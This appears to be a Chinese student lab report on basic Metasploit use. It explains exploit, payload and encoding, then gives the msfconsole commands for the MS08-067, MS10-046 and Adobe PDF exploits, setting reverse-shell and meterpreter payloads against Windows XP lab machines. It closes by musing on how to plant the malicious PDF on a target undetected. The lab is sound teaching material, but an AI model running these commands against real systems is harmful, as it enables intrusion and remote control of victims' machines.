20155226《网络攻防》 Exp5 MSF基础应用

1、用自己的话解释什么是exploit,payload,encode？

exploit ：
Exploit的英文意思就是利用，在做攻击时，通常称为漏洞利用。
一个利用程序(An exploit)就是一段通过触发一个漏洞（或者几个漏洞）进而控制目标系统的代码。
payload ：
payload属于名词，意为有效载荷，在病毒代码中实现一些有害的或者恶性的动作的部分叫做“有效负载”（payload）。
payload可以实现任何运行在受害者环境中的程序所能做的事情，并且能够执行动作包括破坏文件删除文件，向病毒的作者或者任意的接收者发送敏感信息，以及提供通向被感染计算机的后门。
encode ：
encode本意为编码，可在不改变payload功能的情况下对其进行编码，一些好的编码方式可以使攻击或相关的文件不被发现。

1、先用 search ms08_067 指令查询针对该漏洞可以运用的攻击模块
,根据提示，使用 use exploit/windows/smb/ms08_067_netapi 使用该模块，并使用 show payloads查看可以供我们使用的payload：

2、选择通过反向连接来获取shell的 generic/shell_reverse_tcp 作为payload，使用指令 set payload generic/shell_reverse_tcp 对payload进行设置，并使用show options查看：

3、发现源端口和目的端口是默认固定的，需要设置一个RHOST（靶机的IP地址）和一个LHOST（攻击机的IP地址）
，接着使用 exploit 指令开始攻击：

5、攻击成功后获取了靶机的shell，此时可使用 systeminfo 指令查看靶机系统信息：

扫描二维码关注公众号，回复： 82576 查看本文章

1、利用search ms10_046指令查看可以运用的攻击模块，根据提示，使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用该模块，并使用show payloads查看：

2、使用set payload windows/meterpreter/reverse_tcp 设置payload，并使用show options查看参数：

3、使用xp系统打开链接： http://192.168.147.141:80/：

4、使用 sessions -i 1 选择会话1，成功获取了靶机的shell，利用 systeminfo 指令查看靶机的系统信息：

首先还是先利用search adobe进行搜索
,然后进行选择，我选择的是use windows/fileformat/adobe_cooltype_sing
，又试了use windows/fileformat/adobe_flashplayer_button

输入如下代码，对LHOST，LPORT，FILENAME进行配置

set LHOST 192.168.147.141
set LPORT 5226
set FILENAME 20155226-x.pdf

1、在实践中发现MSF攻击的局限性很大，其中的漏洞几乎都是针对win XP系统，而实际应用的系统大部分是win7及以上的系统，如果需要实战攻击win7及以上的系统，还需要不断发现并成功利用新的漏洞。

2、在对Adobe的漏洞攻击中，需要把PDF文件植入被攻击主机，如果在不被发现植入危险的文件的情况下成功将攻击所需文件植入靶机，也是一个值得深思的问题。